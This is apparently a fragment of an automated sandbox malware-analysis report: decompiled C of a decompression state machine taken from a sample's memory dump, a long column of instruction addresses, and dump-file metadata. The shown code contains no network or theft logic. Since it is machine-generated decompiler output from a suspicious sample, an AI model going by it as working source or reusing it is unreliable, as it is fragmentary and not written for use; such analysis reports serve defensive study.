														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004073ce
                                                                                    0x004073cb

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
